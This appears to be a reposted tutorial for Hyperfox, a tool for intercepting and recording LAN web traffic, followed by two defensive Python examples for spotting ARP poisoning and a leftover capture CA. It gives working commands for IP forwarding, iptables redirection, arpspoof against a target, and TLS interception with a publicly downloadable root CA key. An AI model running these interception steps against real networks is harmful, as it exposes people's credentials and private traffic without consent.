Never Ending Security

It starts all here

Hyperfox – A security tool for proxying and recording HTTP and HTTPs traffic.

Hyperfox

Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.


Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully intercepted and recorded. Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire-formatted messages.


Hyperfox is an Open Source project written in the Go programming language.

Setting up a Linux box

Identify both the local IP of the legitimate gateway and its matching network interface.

sudo route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.0.0.1 0.0.0.0 UG 1024 0 0 wlan0
...

The interface in this case is called wlan0 and the interface’s gateway is 10.0.0.1.

export HYPERFOX_GW=10.0.0.1
export HYPERFOX_IFACE=wlan0

Identify the IP address of the target, let’s suppose it is 10.0.0.143.

export HYPERFOX_TARGET=10.0.0.143

Enable IP forwarding on the host for it to act (temporarily) as a common router.

sudo sysctl -w net.ipv4.ip_forward=1

Issue an iptables rule to instruct the host to redirect all traffic that goes to port 80 (commonly HTTP) to the local port where Hyperfox is listening (1080, by default).

sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp \
--destination-port 80 -j REDIRECT --to-port 1080

If you’re planning to capture HTTPs traffic, then issue another iptables rule to instruct the host to redirect all traffic that goes to port 443 (commonly HTTPs) to the local port where Hyperfox is listening (10443, by default).

sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp \
--destination-port 443 -j REDIRECT --to-port 10443

Make sure to undo IP forwarding and iptables rules when they’re not needed anymore.

Capturing plain HTTP traffic

Once the interceptor host is configured to act as a router, some interesting things can be done. For example, it is possible to determine the source and destination of the packets that pass through the host. We’re going to use this fact to redirect packets with destination port 80 to Hyperfox, so we can proxy them to the original destination (and capture them in the process).

First, see Hyperfox’s options:

hyperfox -h

Now start Hyperfox without providing a root CA certificate or key, so it starts in HTTP-only mode:

hyperfox
...
2014/12/31 07:53:29 Listening for incoming HTTP client requests on 0.0.0.0:1080.

In order for the target to redirect packets intended for the router to us, we use arpspoof, a tool that is part of the dsniff suite.

sudo arpspoof -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET \
$HYPERFOX_GW

Once the target starts sending traffic to the host machine, it will in turn redirect port 80 traffic to Hyperfox and we’ll be able to capture everything.
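The redirection above works by replacing the gateway's entry in the target's ARP cache, which is visible from the target itself. The following check is an added example, not part of Hyperfox or of the original post: it parses `ip neigh show` output and flags a gateway entry that differs from a pinned MAC or shares its MAC with another host. The sample tables, the MAC addresses and the interceptor address 10.0.0.50 are constructed for illustration.

```python
import re

# Constructed `ip neigh show` output as seen on the target (10.0.0.143);
# all MAC addresses are made-up, locally administered values.
CLEAN = """\
10.0.0.1 dev wlan0 lladdr 02:00:00:00:00:01 REACHABLE
10.0.0.50 dev wlan0 lladdr 02:00:00:00:00:50 STALE
"""
# Same table after poisoning: the gateway IP now resolves to the MAC of
# 10.0.0.50 (hypothetical interceptor address).
POISONED = """\
10.0.0.1 dev wlan0 lladdr 02:00:00:00:00:50 REACHABLE
10.0.0.50 dev wlan0 lladdr 02:00:00:00:00:50 STALE
10.0.0.90 dev wlan0 FAILED
"""

NEIGH_RE = re.compile(r"^(\S+)\s+dev\s+\S+\s+lladdr\s+([0-9A-Fa-f:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def check_gateway(text, gateway, pinned_mac=None):
    """Return findings that indicate the gateway's ARP entry was replaced."""
    table = parse_neigh(text)
    gw_mac = table.get(gateway)
    if gw_mac is None:
        return ["no ARP entry for gateway %s" % gateway]
    findings = []
    if pinned_mac and gw_mac != pinned_mac.lower():
        findings.append("gateway %s is at %s, pinned MAC is %s"
                        % (gateway, gw_mac, pinned_mac.lower()))
    sharing = sorted(ip for ip, mac in table.items()
                     if mac == gw_mac and ip != gateway)
    if sharing:
        findings.append("gateway MAC %s is also claimed by %s"
                        % (gw_mac, ", ".join(sharing)))
    return findings

if __name__ == "__main__":
    for finding in check_gateway(POISONED, "10.0.0.1", "02:00:00:00:00:01"):
        print("ALERT:", finding)
```

The pinned-MAC comparison is the more reliable of the two checks, because the interceptor's own IP only shows up in the table if the target has talked to it directly.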

Capturing HTTPs traffic

In order to capture HTTPs traffic, Hyperfox needs to decrypt the legitimate SSL communications with the original host and then encrypt them again before serving them to the target. For each host, Hyperfox will generate a certificate and key that will be signed with the provided root CA certificate (-c) and key (-k).


Chances are you don’t have access to a universally trusted root CA certificate and key, so most targets will get suspicious and will interrupt the connection. In order for the target to not get suspicious, a bogus root CA must be manually installed and marked as trusted.

Hyperfox provides a ready-to-use root CA certificate that you can feed to your devices. Consult instructions on how to install certificates on the target OS and be sure to remove the certificate after your capture session is finished.

In order to start capturing SSL traffic, provide a root CA certificate and key to Hyperfox for it to enable both HTTP and HTTPs modes.

mkdir -p ssl
wget https://raw.githubusercontent.com/xiam/hyperfox/master/ssl/rootCA.crt -O ssl/rootCA.crt
wget https://raw.githubusercontent.com/xiam/hyperfox/master/ssl/rootCA.key -O ssl/rootCA.key
hyperfox -c ssl/rootCA.crt -k ssl/rootCA.key
...
2014/12/31 11:58:10 Listening for incoming HTTP client requests on 0.0.0.0:1080.
2014/12/31 11:58:10 Listening for incoming HTTPs client requests on 0.0.0.0:10443.

In order for the target to redirect packets intended for the router to us, we use arpspoof, a tool that is part of the dsniff suite.

sudo arpspoof -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET \
$HYPERFOX_GW

Once the target starts sending traffic to the host machine, it will in turn redirect ports 80 and 443 traffic to Hyperfox and we’ll be able to capture everything.
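The root CA key used above is downloaded from a public repository, so a device that keeps trusting ssl/rootCA.crt after the session will accept certificates signed by anyone who holds that key. The following check is an added example, not part of Hyperfox or of the original post: it compares the SHA-256 fingerprint of the capture CA with every certificate in a PEM trust bundle to confirm the CA was removed. The sample "certificates" are constructed placeholder bytes, and the bundle path is whatever your OS uses (passed as an argument).

```python
import hashlib
import re
import ssl

PEM_RE = re.compile(
    r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)

def fingerprints(pem_text):
    """SHA-256 over the DER bytes of every certificate block in pem_text."""
    return [hashlib.sha256(ssl.PEM_cert_to_DER_cert(block)).hexdigest()
            for block in PEM_RE.findall(pem_text)]

def leftover_entries(capture_ca_pem, bundle_pem):
    """Indexes of bundle entries whose fingerprint matches the capture CA."""
    wanted = set(fingerprints(capture_ca_pem))
    return [i for i, fp in enumerate(fingerprints(bundle_pem)) if fp in wanted]

# Constructed stand-ins: placeholder bytes wrapped as PEM, not real
# certificates. Fingerprinting only needs the decoded bytes.
CAPTURE_CA = ssl.DER_cert_to_PEM_cert(b"constructed capture root CA")
OTHER_CA = ssl.DER_cert_to_PEM_cert(b"constructed public CA")
BUNDLE_DIRTY = OTHER_CA + CAPTURE_CA
BUNDLE_CLEAN = OTHER_CA

if __name__ == "__main__":
    import sys
    # Usage: script.py ssl/rootCA.crt <PEM trust bundle path for your OS>
    ca_path, bundle_path = sys.argv[1], sys.argv[2]
    with open(ca_path) as f, open(bundle_path) as g:
        hits = leftover_entries(f.read(), g.read())
    print("capture CA still trusted at entries:", hits if hits else "none")
    sys.exit(1 if hits else 0)
```

This covers PEM bundle files only; a store kept in another format, such as a browser's own certificate database, needs its own check.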

Getting Hyperfox

Precompiled packages
  • Linux x64
  • OSX x64
  • FreeBSD (pending)
  • OpenBSD (pending)
  • Windows (pending)

You can download a precompiled package and put it into your ~/bin directory, such as in the following example:

mkdir -p ~/bin
export BIN_URL=https://hyperfox.org/files/hyperfox-0.9-darwin-x64.bin
wget $BIN_URL -O ~/bin/hyperfox

Compiling Hyperfox

In any case, compiling Hyperfox from source requires:

  • go1.4
  • gcc
  • git

How to compile on Linux

> go version
go version go1.4 linux/amd64
> go get github.com/xiam/hyperfox

More information can be found at: https://github.com/xiam/hyperfox and at: https://hyperfox.org/
